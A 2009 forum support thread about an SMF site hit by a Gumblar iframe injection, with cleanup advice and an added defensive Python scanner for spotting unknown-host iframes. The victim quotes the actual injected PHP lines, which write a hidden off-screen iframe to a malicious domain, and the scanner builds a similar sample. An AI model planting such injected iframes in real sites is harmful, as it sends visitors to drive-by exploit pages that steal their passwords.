I can't log in nor make a new post please help

Started by perfec2, October 23, 2009, 12:15:24 PM


perfec2

Sorry, I meant cut .htaccess from the "Backups" folder to SMF (root folder).
I meant I opened the URL in a new browser after the changes were made.
I am not using any software.
Link to see the small box http://africatopforum.com/index.php/topic,1766.0.html

Norv

I don't see the text you mention in my browser (using Opera 10), though there seem to be a few things on the page that did not load.
Could you please make a screenshot? What browser are you using?

ETA: Ah. It seems actually that your site has been hacked, with a variant of the gumblar iframe malware.
Please check out:
http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

This is known as the Gumblar/FTP attack, and it works by infecting sites with code redirecting visitors' browsers to a malicious site (in this case, 'hulmeux.com' is the malicious domain, but there are countless others). As you (or anybody else) visit your site, your browser is redirected to this site. The site your browser is redirected to downloads scripts onto the user's computer and attempts to execute them using various vulnerabilities in its software. In case it succeeds, it implants one or more scripts (trojan-like) that steal from their victims' computers the passwords they find in, for example, FTP clients. The malicious users or scripts receiving the passwords connect to the users' FTP accounts and infect everything they find there.
In other words: your computer, or someone else's with admin/FTP access to your site, was infected with a keylogger, and this is how your site was hacked.
Please check out also:
http://news.cnet.com/8301-1009_3-10244529-83.html
And more on the web.

Security recommendations: clean up your computer and any other computer that has FTP access. Change your passwords to everything as soon as possible, from a secured computer. Same for any admin/person with FTP access.

Make sure to also clean up your files:
- option 1: download all files, search all of them for the text '<iframe', and if you find a line that mentions a site like 'hulmeux.com' or another site you haven't heard of (so you didn't put it there), then remove the line and save the file. Same for all files. Then put them back on your web space.
- option 2: download your attachments, avatars and gallery folders, if any, to keep them safe. Then remove all files from your site, except Settings.php and Settings_bak.php (open these to make sure they have nothing like the 'iframe' or 'hulmeux' - if they do, remove that line). Download and unzip a large upgrade package and upload all files into your SMF folder. Then re-add the attachments in the proper folder and everything else you saved before.
To-do lists are for deferral. The more things you write down the later they're done... until you have 100s of lists of things you don't do.

File a security report | Developers' Blog | Bug Tracker


Also known as Norv on D* | Norv N. on G+ | Norv on Github
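A defender-side scanner for option 1 above, added here as an example and not code from this thread or from SMF: it walks a downloaded copy of the site, flags iframe lines that point at hosts not on your own allowlist (with the off-screen style used by the injection as a second signal), and removes them while keeping a quarantine copy. The sample files and the host malicious.example are constructed.

```python
import re
import tempfile
from pathlib import Path

# The injected line in this thread is a PHP echo of document.write('<iframe src=...') with an
# off-screen style. IFRAME_RE extracts the iframe host; HIDDEN_RE flags the hide-it style.
IFRAME_RE = re.compile(r"<iframe[^>]*?src=\\?[\"']?\s*https?://\s*([a-z0-9.-]+)", re.I)
HIDDEN_RE = re.compile(r"position\s*:\s*absolute[^\"']*(top|left)\s*:\s*-\d{3,}", re.I)

def scan_file(path, known_hosts):
    """Return (line_no, host, hidden_style) for each iframe line naming a host not in known_hosts."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            for m in IFRAME_RE.finditer(line):
                host = m.group(1).lower()
                if host not in known_hosts:
                    findings.append((no, host, bool(HIDDEN_RE.search(line))))
    return findings

def scan_tree(root, known_hosts, exts=(".php", ".html", ".js", ".tpl")):
    report = {}  # relative path -> findings; editor backups like index.php~ are included
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and (p.suffix.lower() in exts or p.name.endswith("~")):
            hits = scan_file(p, known_hosts)
            if hits:
                report[p.relative_to(root).as_posix()] = hits
    return report

def remove_flagged_lines(path, known_hosts):
    """Option 1: drop the flagged lines, keeping the original as <name>.quarantine."""
    p = Path(path)
    bad = {no for no, _, _ in scan_file(p, known_hosts)}
    if not bad: return 0
    lines = p.read_text(encoding="utf-8", errors="replace").splitlines(keepends=True)
    p.with_name(p.name + ".quarantine").write_text("".join(lines), encoding="utf-8")
    p.write_text("".join(l for i, l in enumerate(lines, 1) if i not in bad), encoding="utf-8")
    return len(bad)

def build_sample_site(root=None):
    """Constructed sample (not the poster's real files): injected index.php, its backup, a clean page."""
    root = Path(root or tempfile.mkdtemp())
    injected = ('<?php\necho "<script>document.write(\'<iframe src=\\"http://malicious.example'
                '/?click=1\\" width=100 height=100 style=\\"position:absolute;top:-10000;'
                'left:-10000;\\"></iframe>\');</script>";\necho "clean line";\n')
    (root / "index.php").write_text(injected, encoding="utf-8")
    (root / "index.php~").write_text(injected, encoding="utf-8")
    (root / "embed.html").write_text('<iframe src="https://www.youtube.com/embed/x"></iframe>\n', encoding="utf-8")
    return str(root)
```

Run scan_tree over the downloaded copy first and review the report by hand before calling remove_flagged_lines, since a host you forgot to allowlist would otherwise be stripped too.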

perfec2

Working with the first option, I was able to locate the files in question, Index.php and index.php~ respectively.
echo "<script>document.write('<iframe src=\"http:// hulmeux.com/?click=12661703\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>";

echo "<script>document.write('<iframe src=\"http:// hulmeux.com/?click=12713781\" width=100 height=100 style=\"position:absolute;top:-10000;left:-10000;\"></iframe>');</script>";
The small boxes are no longer there. My system is a personal computer used only by me. How could this incident of attack be avoided?
There is no .htaccess in the root folder (smf) now. Does this pose any danger, and what would I do to get one?

Norv

I modified your post to make the links not-clickable.

Quote from: perfec2 on November 11, 2009, 05:46:58 AM
My system is a personal computer used only by me. How could this incident of attack be avoided?
First of all, you need to get rid of it completely. Scan your computer with an up-to-date anti-malware tool (or two, to be sure), and make sure you change all your passwords, because right now it is highly likely that your passwords are known to the malicious users/scripts.
It's not only you: it's also any other admin of your site or person with access to your FTP, if any. They need to do the same.

Second, you can try to keep your computer protected and your software up to date. These attacks from malicious websites can damage your computer (infect it, as this one most likely did) by taking advantage of vulnerabilities in the software you're running. For example, it was known (see the links above) that it got into users' computers through out-of-date Flash or Adobe products.

Third, you can try to run an antivirus tool that protects you from web attacks as well. But please don't expect it to do too much. I don't know what to recommend; I used Kaspersky when I was still on Windows and it was really good in many respects, but it can't protect you from everything on the web: in this instance, my computer was infected in the past with exactly this Gumblar-type malware, and Kaspersky afterwards tried to disinfect the loads of viruses that started pouring into my computer (without much success). Perhaps you can try to make sure you choose carefully what sites to browse, if that is possible at all.

Please see the links above for other recommendations or users experiences with this particular type of malware.

.htaccess in the root SMF folder: the default SMF installation does not have a .htaccess file. It may be possible that it was put there by the malware, I don't know. If you still have a copy of the former file, please feel free to let us know its contents, so we can take a look.

perfec2

Thank you for this information; it is really useful to me. It appears that the .htaccess was added there by the hacker. This is its content:
<Files *>
   Order Deny,Allow
   Deny from all
   Allow from localhost
</Files>
I changed my password through cPanel. Immediately after I logged in through FTP, they hacked the site by redirecting it to another site; these events occurred twice in my presence. I have scanned my computer and have changed my password again. Since I changed the password I have seen that again.
I am concerned now that if I log in with FTP it might occur again. I use FireFTP and Core FTP; I don't really know if that is the case?

perfec2

Thank you for all the time and patience spent assisting me with the challenges I faced.
I am currently working on the clean up side of the challenge.
Once again thank you and have a pleasant day.
